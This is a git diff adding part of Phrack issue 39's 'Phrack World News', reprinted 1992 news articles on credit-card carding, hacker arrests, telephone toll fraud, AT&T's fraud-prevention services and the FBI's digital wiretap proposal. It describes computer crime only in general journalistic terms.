+before the cardholder is aware of the situation.  While the cardholder is not
+liable, the victims usually are businesses like Creative Computers, or the
+credit-card company.
+
+Murphy said his company used to get burned, although he would not divulge the
+extent of its losses.  "It happened until we got wise enough to their ways," he
+said.
+
+Now, with arrangements among various law enforcement agencies, telephone
+companies and mail carriers, as well as a combination of call-tracing routines
+and other verification methods, carders "rarely" succeed, he said.  Also, a
+dozen employees work on credit-card verification now, he said.  "I feel sorry
+for the companies that don't have the resources to devote departments to filter
+these out.  They're the ones that are getting hit hard."
+
+In New York, federal, state and local police have been actively investigating
+carder cases.  Computers were seized and search warrants served on a number of
+locations in December, as part of an ongoing federal investigation into
+carding.  City police arrested two youths in Queens in April after attempting
+to card a $1,500 computer system from Creative Computers.  They were arrested
+when they tried to accept delivery.
+
+"It's a legitimate way to make money. I know people who say they do it,"
+claimed a 16-year-old Long Island hacker who uses the name JJ Flash.
+
+While he says he eschews carding in favor of more traditional, non-malicious
+hacking, JJ Flash said using a computer to break into a credit bureau is as
+easy as following a recipe.  He gave a keystroke-by-keystroke description of
+how it's done, a fairly simple routine that involved disguising the carder's
+calling location by looping through a series of packet networks and a Canadian
+bank's data network, before accessing the credit bureau computer.  Once
+connected to the credit bureau computer, JJ Flash said a password was needed --
+no problem, if you know what underground bulletin boards to check.
+
+"It's really easy to do. I learned to do it in about thirty seconds.  If you
+put enough time and energy into protecting yourself, you'll never get caught,"
+he said.  For instance, an expert carder knows how to check his own phone line
+to see if the telephone company is monitoring it, he claimed.  By changing the
+location of a delivery at the last minute, he said carders have evaded capture.
+
+J J FLASH said that while most carders buy computers and equipment for
+themselves, many buy televisions, videocassette recorders and other goods that
+are easy to sell.  "You can usually line up a buyer before its done," he said.
+"If you have a $600 TV and you're selling it for $200, you will find a buyer."
+
+He said that while TRW has tightened up security during the past year, Equifax
+was still an easy target.
+
+But John Ford, an Equifax spokesman, said he believes that hackers greatly
+exaggerate their exploits.  He said that in the recent San Diego case, only 12
+records were accessed.  "It seems to me the notion that anybody who has a PC
+and a modem can sit down and break in to a system is patently untrue," he said.
+"We don't have any evidence that suggests this is a frequent daily occurrence."
+
+Regardless, Ford said his company is taking additional steps to minimize the
+risk of intrusion. "If one is successful in breaking into the system, then we
+are instituting some procedures that would render the information that the
+hacker receives virtually useless." 
+
+Also, by frequently altering customers' passwords, truncating account
+information so that entire credit-card numbers were not displayed, and possibly
+encrypting other information, the system will become more secure.
+
+"We take very seriously our responsibility to be the stewards of consumer
+information," Ford said.
+
+But others say that the credit bureaus aren't doing enough.  Craig Neidorf,
+publisher of Phrack, an underground electronic publication "geared to computer
+and telecommunications enthusiasts," said that hacking into credit bureaus has
+been going on, and has been easy to do "as long as I've been around."  Neidorf
+said that although he doesn't do it, associates tell him that hacking into
+credit bureau's is "child's play" -- something the credit bureaus have been
+careless about.
+
+"For them not to take some basic security steps to my mind makes them
+negligent," Neidorf said.  "Sure you can go ahead and have the kids arrested
+and yell at them, but why isn't Equifax or any of the other credit bureaus not
+stopping the crime from happening in the first place?  It's obvious to me that
+whatever they're doing probably isn't enough."
+
+A Recent History Of Carding
+
+September 6, 1991:  An 18-year-old American emigre, living in Israel, was
+arrested there for entering military, bank and credit bureau computers.  Police
+said he distributed credit-card numbers to hackers in Canada and the United
+States who used them to make unknown amounts of cash withdrawals.
+
+January 13, 1992:  Four university students in San Luis Obispo, California,
+were arrested after charging $250,000 in merchandise to Mastercard and Visa
+accounts.  The computer intruders got access to some 1,600 credit-card
+accounts, and used the numbers to buy, among other things:  Four pairs of $130
+sneakers; a $3,500 stereo; two gas barbecues and a $3,000 day at Disneyland.
+
+February 13, 1992:  Two teenagers were arrested when one of them went to pick
+up two computer systems in Bellevue, Wash., using stolen credit-card numbers.
+One told police that another associate had hacked into the computer system of a
+mail-order house and circulated a list of 14,000 credit-card numbers through a
+bulletin board.
+
+April 17, 1992:  Acting on a tip from San Diego police, two teenagers in Ohio
+were arrested in connection with an investigation into a nationwide computer
+hacking scheme involving credit-card fraud. Police allege "as many as a
+thousand hackers" have been sharing information for four years on how to use
+their computers to tap into credit bureau databases.  Equifax, a credit bureau
+that was penetrated, admits that a dozen records were accessed.
+
+April 22, 1992:  Two Queens teens were arrested for carding computer equipment.
+_______________________________________________________________________________
+
+ Invading Your Privacy                                             May 24, 1992
+ ~~~~~~~~~~~~~~~~~~~~~
+ By Rob Johnson (The Atlanta Journal and Constitution)(Page A9)
+
+   Some do it for fun, others have more criminal intent.  Regardless, computer
+    users have a range of techniques and weaponry when breaking into files.
+              "Rooting" forbidden files is hog heaven for hackers 
+
+Within an instant, he was in.
+
+Voodoo Child, a 20-year-old college student with a stylish haircut and a well-
+worn computer, had been cruising a massive researchers' network called Internet
+when he stumbled upon a member account he hadn't explored for a while.
+
+The institution performed "Star Wars" research, he later found out, but that
+didn't interest him.  "I don't know or care anything about physics," he said
+recently.  "I just wanted to get root."
+
+And "getting root," hackers say, means accessing the very soul of a computer
+system.
+
+Working through the network, he started a program within the research
+institute's computers, hoping to interrupt it at the right moment.  "I figured
+I just had a second," he said, gesturing with fingers arched above an imaginary
+keyboard.  Suddenly he pounced on the phantom keys.  "And it worked."
+
+He soon convinced the computer he was a system operator, and he built himself a
+back door to Internet:  He had private access to exotic supercomputers and
+operating systems around the world.
+
+Before long, though, the Atlanta-area hacker was caught, foiled by an MCI
+investigator following his exploits over the long-distance phone lines.
+National security experts sweated over a possible breach of top-secret
+research; the investigation is continuing.
+
+And Voodoo Child lost his computer to law enforcement.
+
+"I was spending so much time on the computer, I failed out of college," he
+said.  "I would hack all night in my room, go to bed and get up at 4 in the
+afternoon and start all over."
+
+In college, he and a friend were once discovered by campus police dumpster-
+diving behind the university computer building, searching for any scraps of
+paper that might divulge an account number or a password that might help them
+crack a computer.
+
+Now he's sweating it out while waiting for federal agents to review his case.
+"I'm cooperating fully," he said.  "I don't want to go to prison.  I'll do
+whatever they want me to."
+
+In the meantime, he's back in college and has taken up some art projects he'd
+abandoned for the thrill of computer hacking.
+
+The free-form days of computer hacking have definitely soured a bit -- even for
+those who haven't been caught by the law.
+
+"It's a lot more vicious," Voodoo Child said as a friend nodded in agreement.
+"Card kids" -- young hackers who ferret out strangers' credit card numbers and
+calling card accounts -- are wrecking the loose communal ethic that defined
+hacking's earlier, friendlier days.
+
+And other computer network users, he said, are terrified of the tactics of
+sophisticated hackers who routinely attack other computer users' intelligence,
+reputation and data.
+
+"I used to run a BBS [electronic bulletin board system] for people who wanted
+to learn about hacking," Voodoo Child said.  "But I never posted anything
+illegal.  It was just for people who had questions, who wanted to do it
+properly."
+
+Doing it properly, several Atlanta-area hackers say, means exploring the gaps
+in computer networks and corporate systems.  They say it's an intellectual
+exercise -- and an outright thrill -- to sneak into someone else's computer.
+
+During a recent interview, Voodoo Child and a friend with a valid Internet
+account dialed up the giant network, where some of their counterparts were
+waiting for a reporter to ask them some questions.
+
+"Did you get that information on the Atlanta Constitution reporter you were
+asking about?" a faceless stranger asked.
+
+A startled reporter saw his credit report and credit card numbers flashed
+across the screen.  Voodoo Child offered up the keyboard -- an introduction of
+sorts to a mysterious, intimidating accomplice from deep inside the digital
+otherworld.  "Go ahead," he said.  "Ask him anything you want."
+_______________________________________________________________________________
+
+ KV4FZ: Guilty Of Telephone Toll Fraud                             May 15, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By John Rice (rice@ttd.teradyne.com) in TELECOM Digest V12 #412
+
+St. Croix ham operator, Herbert L. "Herb" Schoenbohm, KV4FZ, has been found
+guilty in federal court of knowingly defrauding a Virgin Islands long-distance
+telephone service reseller.  He was convicted April 24th of possessing and
+using up to fifteen unauthorized telephone access devices in interstate and
+foreign commerce nearly five years ago.
+
+The stolen long distance telephone access codes belonged to the Caribbean
+Automated Long Lines Service, Inc. (CALLS) of St. Thomas, U.S. Virgin Islands.
+Schoenbohm was found to have made more than $1,000 in unauthorized telephone
+calls -- although the prosecution said he was responsible for far more.
+
+According to the Virgin Islands Daily News, Schoenbohm, who is also the St.
+Croix Police Chief of Communications, showed no emotion when he was pronounced
+guilty of the charges by a 12 member jury in U.S  District Court in
+Christiansted.  The case was heard by visiting District Judge Anne Thompson.
+
+Neither Schoenbohm or his defense attorney, Julio Brady, would comment on the
+verdict.  The jury deliberated about seven hours.  The sentencing, which has
+been set for June 26, 1992, will be handled by another visiting judge not
+familiar with the case.
+
+Schoenbohm, who is Vice Chairman of the V.I. Republican Committee, has been
+released pending sentencing although his bail was increased from $5,000 to
+$25,000.  While he could receive a maximum of ten years on each count,
+Assistant U.S. Attorney Alphonse Andrews said Schoenbohm probably will spend no
+more than eight months in prison since all three counts are similar and will be
+merged.
+
+Much of the evidence on the four day trial involved people who received
+unauthorized telephone calls from KV4FZ during a 1987 period recorded by the
+CALLS computer.  Since the incident took place more than five years ago, many
+could not pinpoint the exact date of the telephone calls.
+
+The prosecution produced 20 witnesses from various U.S locations, including
+agents from the Secret Service, the U.S. Marshals Service, Treasury Department
+and Federal Communications Commission.  In addition ham operators testified for
+the prosecution.
+
+Schoenbohm was portrayed as a criminal who had defrauded calls out of hundreds
+of thousands of dollars.  Schoenbohm admitted using the service as a paying
+customer, said it did not work and that he terminated the service and never
+used it again.  He feels that there was much political pressure to get him
+tried and convicted since he had been writing unfavorably articles about
+Representative DeLugo, a non-voting delegate to Congress from the Virgin
+Islands, including his writing of 106 bad checks during the recent rubbergate
+scandal.
+
+Most, but not all the ham operators in attendance were totally opposed to
+KV4FZ.  Bob Sherrin, W4ASX from Miami attended the trial as a defense character
+witness.  Sherrin told us that he felt the conviction would be overturned on
+appeal and that Schoenbohm got a raw deal.  "They actually only proved that he
+made $50 in unauthorized calls but the jury was made to believe it was $1,000."
+
+Schoenbohm's attorney asked for a continuance due to newly discovered evidence,
+but that was denied.  There also is a question as to whether the jury could
+even understand the technology involved.  "Even his own lawyer couldn't
+understand it, and prepared an inept case," Sherrin said.  "I think he was
+railroaded.  They were out to get him.  There were a lot of ham net members
+there and they were all anti-Herb Schoenbohm.  The only people that appeared
+normal and neutral were the FCC.  The trial probably cost them a million
+dollars.  All his enemies joined to bring home this verdict."
+
+Schoenbohm had been suspended with pay from the police department job since
+being indicted by the St. Croix grand jury.  His status will be changed to
+suspension without pay if there is an appeal.  Termination will be automatic if
+the conviction is upheld.  Schoenbohm's wife was recently laid off from her job
+at Pan Am when the airline closed down.  Financially, it could be very
+difficult for KV4FZ to organize an appeal with no money coming in.
+
+The day after the KV4FZ conviction, Schoenbohm who is the Republican Committee
+vice chairman was strangely named at a territorial convention as one of eight
+delegates to attend the GOP national convention in Houston this August.  He was
+nominated at the caucus even though his felony conviction was known to
+everyone.  Schoenbohm had even withdrawn his name from consideration since he
+was now a convicted felon.
+
+The Virgin Island Daily News later reported that Schoenbohm will not be
+attending the GOP national convention.  "Schoenbohm said he came to the
+conclusion that my remaining energies must be spent in putting my life back
+together and doing what I can to restore my reputation.  I also felt that any
+publicity in association with my selection may be used by critics against the
+positive efforts of the Virgin Islands delegation."
+
+Schoenbohm has been very controversial and vocal on the ham bands.  Some ham
+operators now want his amateur radio license pulled -- and have made certain
+that the Commission is very much aware of his conviction.
+_______________________________________________________________________________
+
+ AT&T Launches Program To Combat Long-Distance Theft               May 13, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Virginia Randall (United Press International/UPI)
+
+Citing the mushrooming cost of long-distance telephone fraud, American
+Telephone & Telegraph Co. announced plans to combat theft of long-distance
+telephone services from customers.
+
+AT&T's program, dubbed NetProtect, is an array of software, consulting,
+customer education and monitoring services for businesses.  One program limits
+customer liability to the first $25,000 of theft, while another ends customer
+liability entirely under certain circumstances.
+
+By law, companies are liable for the cost of calls made on their systems,
+authorized or not.
+
+Jerre Stead, president of AT&T's Business Communications unit, said, "The
+program not only offers financial relief to victims of long-distance fraud.
+It also gives our customers new products and services specifically designed to
+prevent and detect fraud."
+
+Long-distance calling fraud ranges from a few dollars to the hundreds of
+thousands of dollars for victims.  The Communications Fraud Control
+Association, an industry group, estimates long-distance calling fraud costs
+more than $1 billion a year, said Peggy Snyder, an association spokeswoman.
+
+NetProtect Basic Service, offered free with long-distance and domestic 800
+service, consists of ongoing monitoring around the clock for unusual activity.
+
+The company will start this service this week.
+
+NetProtect Enhanced and Premium services offer more customized monitoring and
+limit customer liability to $25,000 per incident or none at all, depending on
+the program selected.
+
+Pricing and permission to provide the Enhanced and Premium services are
+dependent on Federal Communication Commission approval.  AT&T expects to offer
+these programs beginning August 1.
+
+Other offerings are a $1,995 computer software package called "Hacker Tracker,"
+consulting services and the AT&T Fraud Intervention Service, a swat team of
+specialists who will detect and stop fraud while it is in progress.
+
+The company also will provide a Security Audit Service that will consult with
+customers on possible security risks.  Pricing will be calculated on a case-by-
+case basis, depending on complexity.
+
+The least expensive option for customers is AT&T's Security Handbook and
+Training, a self-paced publication available for $65 which trains users on
+security features for AT&T's PBX, or private branch exchanges, and voice mail
+systems.
+
+Fraud occurs through PBX systems, which are used to direct the external
+telephone calls of a business.
+
+Company employees use access codes and passwords to gain entry to their PBX
+system.  A typical use, the industry fraud group's Snyder said, would be a
+sales force on the road calling into their home offices for an open line to
+call other customers nationally or worldwide.
+
+These access codes can be stolen and used to send international calls through
+the company's network, billable to the company.
+
+Unauthorized access to PBXs occur when thieves use an automatic dialing feature
+in home computers to dial hundreds of combinations of phone numbers until they
+gain access to a company's PBX system.
+
+These thieves, also known as hackers, phone freaks or phrackers, then make
+their own calls through the PBX system or sell the number to a third party to
+make calls.
+
+Others use automatic dialing to break into PBX systems through voice mail
+systems because such systems have remote access features.
+
+Calls from cellular phones also are at risk if they are remotely accessed to a
+PBX.  Electronic mail systems for intracompany calls are not affected because
+they don't require PBX systems.
+
+According to Bob Neresian of AT&T, most fraud involves long-distance calls to
+certain South American and Asian countries, especially Columbia and Pakistan.
+
+There is no profile of a typical company at risk for telephone fraud, said
+Snyder.
+
+"Any company of any size with long-distance service is at risk," she said.
+"Criminals don't care who the long distance provider is or how big the company
+they're stealing from is."
+
+She said the industry recognized the dimensions of telephone theft in 1985,
+when the Communications Fraud Control Association was formed in Washington D.C.
+The group consists of providers of long-distance service, operator services,
+private payphones, end-users of PBX systems, federal, state and local law
+enforcement agencies and prosecutors.
+
+Janice Langley, a spokeswoman for US Sprint Corp. in Kansas City, Mo., called AT&T's announcement similar to a program her company announced March 31.
+
+That service, SprintGuard Plus, is available to companies with a call volume
+of $30,000 a month.  Sprint also offers basic monitoring program to customers
+without charge.
+
+"We don't have minimum billing requirements for any of these services or
+systems," responded AT&T's Neresian.  "All the carriers have seen the problem
+and have been working on their own approaches," he said.
+
+Jim Collins, a spokesman for MCI Communications in Washington, said his company
+had been conducting phone fraud workshops free of charge for customers for four
+years.
+_______________________________________________________________________________
diff --git a/phrack39/12.txt b/phrack39/12.txt
new file mode 100644
index 0000000..b9cb057
--- /dev/null
+++ b/phrack39/12.txt
@@ -0,0 +1,535 @@
+                                ==Phrack Inc.==
+
+                 Volume Four, Issue Thirty-Nine, File 12 of 13
+
+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+              PWN                                             PWN
+              PWN              Phrack World News              PWN
+              PWN                                             PWN
+              PWN       Issue XXXIX / Part Three of Four      PWN
+              PWN                                             PWN
+              PWN        Compiled by Datastream Cowboy        PWN
+              PWN                                             PWN
+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+
+ New Phones Stymie FBI Wiretaps                                  April 29, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Simson L. Garfinkel (Christian Science Monitor)(Page 12)
+
+        "Legislation proposed by Justice Department would change the way
+        telecommunications equipment is developed in the United States."
+
+For more than 50 years, wiretapping a telephone has been no more difficult than
+attaching two clips to a telephone line.  Although legal wiretaps in the United
+States have always required the approval of a judge or magistrate, the actual
+wiretap has never been a technical problem.  Now that is changing, thanks to
+the same revolution in communications that has made car phones, picture
+telephones, and fax machines possible.
+
+The only thing a person tapping a digital telephone would hear is the
+indecipherable hiss and pop of digital bits streaming past.  Cellular
+telephones and fiber-optic communications systems present a would-be wiretapper
+with an even more difficult task:  There isn't any wire to tap.
+
+Although cellular radio calls can be readily listened in on with hand-held
+scanners, it is nearly impossible to pick up a particular conversation -- or
+monitor a particular telephone -- without direct access to the cellular
+telephone "switch," which is responsible for connecting the radio telephones
+with the conventional telephone network.
+
+This spring, the Federal Bureau of Investigation (FBI) unveiled legislation
+that would require telephone companies to include provisions in their equipment
+for conducting court-ordered wiretaps. But critics of the legislation,
+including some members of Congress, claim that the proposals would expand the
+FBI's wiretap authority and place an undue burden on the telecommunications
+industry.
+
+Both sides agree that if provisions for monitoring communications are not made
+in the planning stages of new equipment, it may eventually become impossible
+for law enforcement personnel to conduct wiretaps.
+
+"If the technology is not fixed in the future, I could bring an order [for a
+wiretap] to the telephone company, and because the technology wasn't designed
+with our requirement in mind, that person could not [comply with the court
+order]," says James K. Kalstrom, the FBI's chief of engineering.
+
+The proposed legislation would require the Federal Communications Commission
+(FCC) to establish standards and features for makers of all electronic
+communications systems to put into their equipment, require modification of all
+existing equipment within 180 days, and prohibit the sale or use of any
+equipment in the US that did not comply.  The fine for violating the law would
+be $10,000 per day.
+
+"The FBI proposal is unprecedented," says Representative Don Edwards (D) of
+California, chairman of the House Judiciary Subcommittee on Civil and
+Constitutional Rights and an outspoken critic of the proposal.  "It would give
+the government a role in the design and manufacture of all telecommunications
+equipment and services."
+
+Equally unprecedented, says Congressman Edwards, is the legislation's breadth:
+The law would cover every form of electronic communications, including cellular
+telephones, fiber optics, satellite, microwave, and wires.  It would cover
+electronic mail systems, fax machines, and all networked computer systems.  It
+would also cover all private telephone exchanges -- including virtually every
+office telephone system in the country.
+
+Many civil liberties advocates worry that if the ability to wiretap is
+specifically built into every phone system, there will be instances of its
+abuse by unauthorized parties.
+
+Early this year, FBI director William Sessions and Attorney General William
+Barr met with Senator Ernest F. Hollings (D) of South Carolina, chairman of the
+Senate Commerce Committee, and stressed the importance of the proposal for law
+enforcement.
+
+Modifying the nation's communications systems won't come cheaply.  Although
+the cost of modifying existing phone systems could be as much as $300 million,
+"We need to think of the costs if we fail to enact this legislation," said Mr.
+Sessions before a meeting of the Commerce, Justice, State, and Judiciary
+Subcommittees in April.  The legislation would pass the $300 million price-tag
+along to telephone subscribers, at an estimated cost of 20 cents per line.
+
+But an ad-hoc industry coalition of electronic communications and computer
+companies has objected not only to the cost, but also to the substance of the
+FBI's proposal.  In addition, they say that FCC licensing of new technology
+would impede its development and hinder competitiveness abroad.
+
+Earlier this month, a group of 25 trade associations and major companies,
+including AT&T, GTE, and IBM, sent a letter to Senator Hollings saying that "no
+legislative solution is necessary."  Instead, the companies expressed their
+willingness to cooperate with the FBI's needs.
+
+FBI officials insist that legislation is necessary.  "If we just depend on
+jaw-boning and waving the flag, there will be pockets, areas, certain places"
+where technology prevents law enforcement from making a tap, says Mr. Kalstrom,
+the FBI engineer.  "Unless it is mandatory, people will not cooperate."
+
+For example, Kalstrom says, today's cellular telephone systems were not built
+with the needs of law enforcement in mind.  "Some companies have modified their
+equipment and we can conduct surveillance," he says.  But half of the companies
+in the US haven't, he adds.
+
+Jo-Anne Basile, director of federal relations for the Cellular
+Telecommunications Industry Association here in Washington, D.C., disagrees.
+
+"There have been problems in some of the big cities because of [limited]
+capacity," Ms. Basile says.  For example, in some cities, cellular operators
+had to comply with requests for wiretaps by using limited "ports" designed for
+equipment servicing.  Equipment now being installed, though, has greatly
+expanded wiretap capacity in those areas.
+
+"We believe that legislation is not necessary because we have cooperated in
+the past, and we intend on cooperating in the future," she adds.
+
+The real danger of the FBI's proposal is that the wiretap provisions built in
+for use by the FBI could be subverted and used by domestic criminals or
+commercial spies from foreign countries, says Jerry Berman, director of the
+Electronic Frontier Foundation, a computer users' protection group in
+Cambridge, Mass.
+
+"Anytime there is a hearing on computer hackers, computer security, or
+intrusion into AT&T, there is a discussion that these companies are not doing
+enough for security.  Now here is a whole proposal saying, 'Let's make our
+computers more vulnerable.'  If you make it more vulnerable for the Bureau,
+don't you make it more vulnerable for the computer thief?"
+
+Civil liberties advocates also worry that making wiretaps easier will have the
+effect of encouraging their use -- something that the FBI vehemently denies.
+
+"Doing a wiretap has nothing to do with the [technical] ease," says Kalstrom.
+"It is a long legal process that we must meet trying all other investigations
+before we can petition the court."
+
+Kalstrom points out the relative ease of doing a wiretap with today's telephone
+system, then cites the federal "Wiretap Report," which states that there were
+only 872 court-approved wiretaps nationwide in 1990.  "Ease is not the issue.
+There is a great dedication of manpower and cost," he says.  But digital
+wiretapping has the potential for drastically lowering the personnel
+requirements and costs associated with this form of electronic surveillance.
+Computers could listen to the phone calls, sitting a 24-hour vigil at a low
+cost compared with the salary of a flesh-and-blood investigator.
+
+"Now we are seeing the development of more effective voice-recognition
+systems," says Edwards.  "Put voice recognition together with remote-access
+monitoring, and the implications are bracing, to say the least."
+
+Indeed, it seems that the only thing both sides agree on is that digital
+telephone systems will mean more secure communications for everybody.
+
+"It is extremely easy today to do a wiretap:  Anybody with a little bit of
+knowledge can climb a telephone poll today and wiretap someone's lines," says
+Kalstrom.  "When the digital network goes end-to-end digital, that will
+preclude amateur night.  It's a much safer network from the privacy point of
+view."
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+ FBI Fight With Computer, Phone Firms Intensifies                   May 4, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ Taken from Los Angeles Times (Business, Part D, Page 2)
+
+               "Spy Agencies Oppose Technology That Will Prevent
+                 Them From Tapping Into Data And Conversations"
+
+Top computer and telecommunications executives are fighting attempts by the FBI
+and the nation's intelligence community to ensure that government surveillance
+agencies can continue to tap into personal and business communications lines as
+new technology is introduced.
+
+The debate flared last week at a House Judiciary Committee hearing on foreign
+intelligence agencies' attempts to gather U.S. companies' secrets.  The
+committee's chairman, Representative Jack Brooks (D-Tex.), called the hearing
+to complain that the FBI and the National Security Agency (NSA) are hurting
+companies' attempts to protect their communications.
+
+The issue has been heating up on two fronts.  Phone companies have been
+installing digital equipment that frustrates phone tapping efforts, and
+computer companies are introducing new methods of securing data transmissions
+that are almost impossible for intelligence agencies to penetrate.
+
+The controversy centers, in part, on an FBI attempt to persuade Congress to
+force telephone companies to alter their digital networks, at a possible cost
+of billions of dollars that could be passed on to ratepayers, so that the FBI
+can continue performing court-authorized wiretaps.  Digital technology
+temporarily converts conversations into computerized code, which is sent at
+high speed over transmission lines and turned back to voice at the other end,
+for efficient transmission.
+
+Civil liberties groups and telecommunications companies are fiercely resisting
+the FBI proposal, saying it will stall installation of crucial technology and
+negate a major benefit of digital technology:  Greater phone security.  The
+critics say the FBI plan would make it easier for criminals, terrorists,
+foreign spies and  computer hackers  to penetrate the phone network.  The FBI
+denies these and other industry assertions.
+
+Meanwhile, the NSA, the nation's super-secret eavesdropping agency, is trying
+to ensure that government computers use a computer security technology that
+many congressmen and corporate executives believe is second-rate, so that NSA
+can continue monitoring overseas computer data transmissions.  Corporations
+likely would adopt the government standard.
+
+Many corporate executives and congressmen believe that a branch of the Commerce
+Department that works closely with NSA, the National Institute of Standards and
+Technology (NIST), soon will endorse as the government standard a computer-
+security technology that two New Jersey scientists said they penetrated to
+demonstrate its weakness.  NIST officials said that their technology wasn't
+compromised and that it is virtually unbreakable.
+
+"In industry's quest to provide security (for phones and computers), we have a
+new adversary, the Justice Department," said D. James Bidzos, president of
+California-based RSA Data Security Inc., which has developed a computer-
+security technology favored by many firms over NIST's.  "It's like saying that
+we shouldn't build cars because criminals will use them to get away."
+
+"What's good for the American company may be bad for the FBI" and NSA, said
+Representative Hamilton Fish Jr. (R-N.Y.).  "It is a very heavy issue here."
+
+The situation is a far cry from the 1950s and 1960s, when companies like
+International Business Machines Corporation and AT&T worked closely with law-
+enforcement and intelligence agencies on sensitive projects out of a sense of
+patriotism.  The emergence of a post-Vietnam generation of executives,
+especially in new high-technology firms with roots in the counterculture, has
+short-circuited the once-cozy connection, industry and government officials
+said.
+
+"I don't look at (the FBI proposal) as impeding technology," FBI Director
+William S. Sessions testified at the Judiciary Committee hearing.  "There is a
+burden on the private sector . . . a price of doing business."
+
+FBI officials said they have not yet fumbled a criminal probe due to inability
+to tap a phone, but they fear that time is close.  "It's absolutely essential
+we not be hampered," Sessions said.  "We cannot carry out our responsibilities"
+if phone lines are made too secure.
+
+On the related computer-security issue, the tight-lipped NSA has never
+commented on assertions that it opposes computerized data encryption
+technologies like that of RSA Data Security because such systems are
+uncrackable.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+For more articles on this same topic, please see:
+
+Phrack 38, File 11; The Digital Telephony Proposal.
+_______________________________________________________________________________
+
+ FBI Seeks Compiled Lists For Use In Its Field Investigation     April 20, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Ray Schultz (DMNews)(Page 1)
+ Special Thanks: The Omega and White Knight
+
+Washington, D.C. -- The Federal Bureau of Investigation, in a move that could
+spell trouble for the industry, reported is seeking commercial mailing lists
+for use in its investigations.
+
+Spokespersons for both MetroMail Corporation and Donnelley Marketing confirmed
+that they were approached for services within the last two weeks and other
+firms also received feelers.
+
+Neither of the identified firms would discuss details, but one source familiar
+with the effort said the FBI apparently is seeking access to a compiled
+consumer database for investigatory uses.
+
+The FBI agents showed "detailed awareness" of the products they were seeking,
+and claimed to have already worked with several mailing list companies,
+according to the source.
+
+Metromail, which has been supplying the FBI with its MetroNet address lookup
+service for two years, did not confirm this version of events.  Spokesperson
+John Tomkiw said only that the firm was asked by the FBI about a "broadening"
+of its services.
+
+The firm has supplied the bureau with a full listing of its products and
+services, but has not yet been contacted back and is not sure what action it
+will take, said Tomkiw.
+
+Donnelley was also vague on the specifics of the approach, but did say it has
+declined any FBI business on the grounds that it would be an inappropriate use
+of its lists.
+
+FBI spokesperson Bill Carter was unable to provide confirmation, although he
+did verify that the FBI uses MetroNet to locate individuals needed for
+interviews.
+
+If the database scenario is true, it would mark the first major effort by a
+government agency to use mailing lists for enforcement since the Internal
+Revenue Service tried to use rented lists to catch tax cheats in 1984.
+
+"We have heard of it," said Robert Sherman, counsel to the Direct Marketing
+Association and attorney with the firm of Milgrim Thomajan & Lee, New York. 
+"We'd like to know more about it.  If it is what it appears to be, law
+enforcement agents attempting to use marketing lists for law enforcement
+purposes, then the DMA and industry would certainly be opposed to that on
+general principles."
+
+Such usage would "undermine consumer confidence in the entire marketing process
+and would intrude on what otherwise would be harmless collection of data,"
+Sherman said.
+
+RL Polk, which has not been contacted, said it would decline for the same
+reasons if approached.
+
+"That's not a proper use of our lists," said Polk chairman John O'Hara.  "We're
+in the direct mail business and it's our policy not to let our lists be used
+for anything but marketing purposes."
+
+According to one source, who requested anonymity, the FBI intimated that it
+would use its subpoena power if refused access to the lists.
+
+The approaches, made through the FBI training center in Quantico, VA, 
+reportedly were not the first.
+
+The FBI's Carter said the MetroNet product was used for address lookups only.
+
+"If a field office needs to locate somebody for an interview, we can check the
+[MetroNet] database as to where they reside and provide that information to the
+field office," he said.
+
+However, the product was cited as a potential threat to privacy last year by
+Richard Kessel, New York State Consumer Affairs Commissioner.
+
+In a statement on automatic number identifiers, Kessel's office said that "one
+firm offers to provide 800-number subscribers immediate access to information
+on 117-million customers in 83-million households nationwide.
+
+"The firm advertises that by matching the number of an incoming call into its
+database, and an 800 subscriber within seconds can find out such information as
+whether the caller has previously purchased items from their companies."
+
+Kessel included a copy of a trade ad for MetroNet, in which the product is
+presented as a direct marketing tool.
+
+Under the headline "Who am I?" the copy reads as if it is by an imaginary
+consumer.
+
+"The first step to knowing me better is as easy as retrieving my phone number
+in an Automatic Number Identification environment," it says.  "Within seconds
+you can search your internal database to see if I've purchased from you before.
+And if it's not to be found, there's only one place to go -- to MetroNet.
+
+"MetroNet gives you immediate access to information on 117-million consumers in
+83-million households nationwide: recent addresses; phone numbers; specific
+demographics and household information."
+
+Tomkiw defended the product, saying its primary focus is "direct marketing.
+We're always sensitive to those types of issues."
+
+MetroNet works as an electronic white pages, but does not contain "a lot of
+demograhpic data," he said.  "It's primarily used by the real estate and
+insurance industries."
+
+The 1984 IRS effort reportedly was a failure, but it created a public outcry
+and much negative publicity for the industry.  Though Polk, MetroMail and
+Donnelley all refused to rent their lists for the effort, the IRS was able to
+locate other lists through Dunhill of Washington.  Most industry sources say
+that such efforts are doomed to fail because lists are useful only in
+identifying people in aggregate, not as individuals."
+_______________________________________________________________________________
+
+ Do You Know Where Your Laptop Is?                                 May 11, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Robert Kelly (InformationWeek)
+
+           Are your executives carrying computers with critical data?
+                     If so, company secrets are vulnerable
+
+It was an expensive round of window shopping.  On December 17, 1990, David
+Farquhar parked his car in downtown London to browse through an automobile
+showroom.  A Wing Commander in Great Britain's Royal Air Force, he was enjoying
+a few moments away from the mounting pressures leading up to the Gulf War,
+which would begin less than a month later.
+
+But Farquhar made a huge mistake:  He left his laptop computer in his car.  And
+although he was gone a mere five minutes, by the time he returned, the laptop
+had been stolen -- as had U.S. General Norman Schwarzkopf's plans, stored in
+the computer's disk drive, for the upcoming Allied strike against Iraq.
+
+Farquhar paid dearly for his carelessness.  Soon after the red-faced Wing
+Commander reported the incident, he was court-martialed, demoted, and slapped
+with a substantial fine.  The computer was anonymously returned a week later-
+with the disk drive intact.
+
+Farquhar may feel alone in his dilemma and rue the wrong turn his life has
